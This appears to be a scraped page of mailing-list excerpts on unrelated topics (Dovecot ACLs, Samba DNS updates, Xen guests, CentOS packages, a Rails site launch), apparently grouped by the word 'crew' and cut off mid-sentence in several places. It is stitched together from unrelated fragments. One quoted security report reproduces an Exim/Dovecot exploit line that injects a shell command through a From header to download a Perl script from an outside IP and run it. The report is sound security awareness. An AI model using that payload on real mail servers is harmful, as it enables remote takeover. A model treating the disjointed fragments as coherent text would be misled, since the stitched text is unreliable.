ACL hide folders
After updating from 2.2.22 to 2.2.33 rsp 2.3.8 my ACLs went bust.
Below line in the global acl file hides all folders except INBOX for all
users
> * group=ALL
Next reenable certain folders, eg:
> Sent group=ALL lrwsi
This made anyone see "Sent" in 2.2.22, but no longer so in 2.2.33
Any ideas how to have it like before?

Does 3.2.0 make any changes to the TDB format? If not, is it possible
to drop backwards to a stable version?
Printing via LPD or IPP directly to CUPS works flawlessly every time.

looked good and the domain *is working* but there are some issues.
Automatic DNS update is not working. Workstations seem to be
registering their names but joining a server to the domain works but
fails with a error - and the DNS record is *not* added.
[root at crew etc]# net ads join -U Administrator
Enter Administrator's password:
Using short domain name -- BACKBONE
Joined 'CREW' to realm 'micore.us'
DNS update failed!

from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:
From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against
itself. This feature, unfortunately, is found in the example wiki o...

To all of the group
I am pretty much a newbie at CentOS, and Linux on client side,
I would like to help out occasionally by helping the web development crew in
their endeavors and by sorting out some stuff.
such as repairing broken links, or just scanning for content and maybe even
doing a little bit of consulting.

Backuppc-updates on CentOS
...pel, a repo one
maybe shouldn't choose as a primary repo for ones CentOS-systems if you can
help it. At least that's the impression I got from the various posts to this
list.
I thought all packages available from the prominent American upstream provider
got a treatment from the CentOS crew? Am I wrong or am I missing something
really basic, or some part of the CentOS philosophy here? Or isn't BackupPC a
package worthy of being CentOSified? 8-)
Thanks.

No cdrom in windows 2003 HVM guest
Hello,
I have a win2003 HVM guest running, however I cannot see a CDROM device
from the windows machine.
I have ''cdrom=/path_to_my_iso'' in the config file, and this worked fine
for the initial OS install. Now there is no CD device that shows in the
windows device manager.
So, how do I get a CD device to show in win2003?
I''m using xen 3.0.3 compiles from source.

Attention FreeBSD Gurus
...unless `/sbin/sysctl -nq net.inet.accf.http`.empty?
$tcp_defer_accept_opts = [Socket::SOL_SOCKET, Socket::SO_ACCEPTFILTER, [''httpready'', nil].pack(''a16a240'')]
end
end
end
I''d like to know the following from the FreeBSD crew:
1) Are there any potential malicious potentials to this? I don''t assume any intent, but would like to know if I need to rush out a fix if there''s a hackable problem with this (even theoretical).
2) What would be the un-ghetto way to do this same check?
Thanks a bunch.

The site is for legendary punk rock record label, Fat Wreck Chords and it

The old site was highly trafficked, with millions of page views per month
and we expect this one to be also. So far, the server isn''t even breaking a
sweat.
Thank you Rails crew! The project wouldn''t have been as fun without you.

As a part of this effort, I have started a development team called "The

with the maintenance of the stable branch. We will also help to
identify and complete some easier development tasks that can be
completed for CVS head. There is plenty of work to be...

time limit, and is also the default, obviously.
This is a global config directive, ie it effects all clients connected
to all mount points. Should I also add a mount-specific one? What
should I call it?
I can submit the patch to oddsock and crew if they're interested in
using it.

Please forgive the (almost?) OT post. (and the fact that I need a clue-bat)
We've got a situation at one of our sites where a construction crew is
likely to dig up our conduit which houses some data fiber and one pair
of fiber used to tie a Definity 3gsi at a small office building to the
rest of the phone system (school district). We're using a pair of

NetApp vfiler example scripts
Hi,
For anyone who is interested; I created some basic scripts based on my
current iSCSI block script.
http://kinkrsoftware.nl/contrib/xen/block-netapp
http://kinkrsoftware.nl/contrib/xen/netapp-lun.py
Basically these two scripts allow you to start a vfiler with a qtree of
customers. You log in the NetApp upon boot, and can use:
netapp://customer1/disk1
It is work in progress... because I
